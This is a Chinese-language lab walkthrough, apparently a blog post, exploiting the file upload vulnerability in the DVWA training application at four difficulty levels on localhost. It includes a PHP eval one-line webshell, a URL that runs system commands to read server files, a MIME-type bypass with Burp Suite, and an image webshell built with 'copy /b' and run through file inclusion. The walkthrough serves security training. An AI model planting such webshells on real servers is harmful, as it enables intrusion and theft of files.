1.4 DVWA親測文件上傳漏洞

Low

---

---

先看看源代碼：

 

<?php if(isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to?
              $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the file to the upload folder?
             if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ],$target_path) ) { // No
                   $html .= '<pre>Your image was not uploaded.</pre>'; } else { // Yes!
                   $html .= "<pre>{$target_path} succesfully uploaded!</pre>"; } } ?>

這是最開始的頁面 ：

咱們嘗試上傳桌面上的一個圖片 ：

提示咱們成功上傳 ： 

這是咱們來研究一下這個路徑 ：

../../hackable/uploads/1.jpg succesfully uploaded!

這是一個絕對路徑，咱們直接輸入網址 ：  http://127.0.0.1/DVWA/hackable/uploads/1.jpg

 

這個時候咱們嘗試上傳桌面上的 ：1.php文件

寫入內容爲 <?php phpinfo();?>

咱們發現上傳成功，服務器並未做任何過濾限制：

 

咱們再次訪問上傳的路徑 ：  http://127.0.0.1/DVWA/hackable/uploads/1.php

 

 

這裏就說明存在文件上傳漏洞，可以上傳而且執行php文件

這個時候若是咱們上傳一句話木馬 ： <?php @eval($_GET['joker']);?>

而且用中國菜刀進行鏈接，就能夠獲得這個服務器的Webshell,初步的控制了這臺服務器

 咱們先進行上傳：

上傳成功後咱們來訪問 : 

頁面沒有報錯，說明上傳成功

 

1.這時咱們輸入網址 :

http://127.0.0.1/DVWA/hackable/uploads/2.php?joker=system('type D:\\PHP\\wamp\\www\\DVWA\\php.ini');

發現能夠成功操做，利用這個咱們能夠查看服務器下因此文件夾

 

2.或者打開中國菜刀，而且寫入路經 :  http://127.0.0.1/DVWA/hackable/uploads/2.php

選擇連接 ：

這樣咱們就一樣能夠訪問這個服務器的任何文件夾，可見，文件上傳漏洞是很是具備危害性的

 

---

Medium級：

先看源代碼：

<?php if(isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to?
        $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information
        $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; // Is it an image?
        if(( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) { // Can we move the file to the upload folder?
          if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) 
 { // No
             $html .= '<pre>Your image was not uploaded.</pre>'; } else { // Yes!
             $html .= "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } ?>

看代碼:

$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];

$uploaded_type == "image/jpeg" || $uploaded_type == "image/png")&&( $uploaded_size<100000 )

這兩句對上傳的文件類型跟文件大小都進行了判斷過濾，估計1.php上傳會被攔截

根據low等級的經驗，咱們嘗試上傳1.php:

果真過濾了php文件，錯誤提示只能上傳jpg,png格式的文件

這時咱們能夠用burpsuite抓包，來查看上傳成功跟失敗的包有哪些不一樣:

咱們先上傳正常的1.jpg ，burpsuite抓到的包爲：

而後咱們上傳1.php，同時用burpsuite抓一下上傳失敗的包 :  

 

對比來看，只是上傳類型的不一樣，咱們嘗試抓包，更改上傳類型 : 

 

接下來就是LOW等級的老套路，這裏再也不贅述

 

---

---

High級：

源代碼以下：

<?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to?
         $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information
        $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; // Is it an image?
        if((strtolower($uploaded_ext) == "jpg" || strtolower($uploaded_ext) ==                 "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&($uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) ) { // Can we move the file to the upload folder?
             if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { // No
                $html .= '<pre>Your image was not uploaded.</pre>'; } else { // Yes!
                 $html .= "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file
           $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } ?>

 

也就是說，LOW等級跟Middem等級的方法都已經失效

 

1. 這個時候咱們想是否是能夠把php僞形成jpg繞過，也就是製做一句話圖片馬

 

1. 使用CMD製做一句話木馬。
2. 參數/b指定以二進制格式複製、合併文件; 用於圖像類/聲音類文件
3. 參數/a指定以ASCII格式複製、合併文件。用於txt等文檔類文件
4. copy 1.jpg/b+1.php 2.jpg
5. //意思是將1.jpg以二進制與1.php合併成2.jpg
6. 那麼2.jpg就是圖片木馬了

圖片馬就作好了 ： 

咱們用notepad++ 打開能夠看見這麼一句話 :  

而後咱們就可上傳了 ： 

這時咱們能夠藉助php文件解析漏洞，輸入網址 :

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://D:\PHP\wamp\www\DVWA\hackable\uploads\2.jpg

這樣就能夠訪問圖片馬包含的php代碼

接下來就是老套路，再也不贅述

---

---

Impossible級：

咱們先來看代碼：

<?php
 
if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
 
 
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
 
    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
 
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {
 
        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );
 
        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            $html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
 
        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
 
// Generate Anti-CSRF token
generateSessionToken();
 
?>

咱們嘗試上傳一張圖片1.jpg : 

咱們上傳的文件名都被從新設計，可想而知，咱們的圖片馬已經失效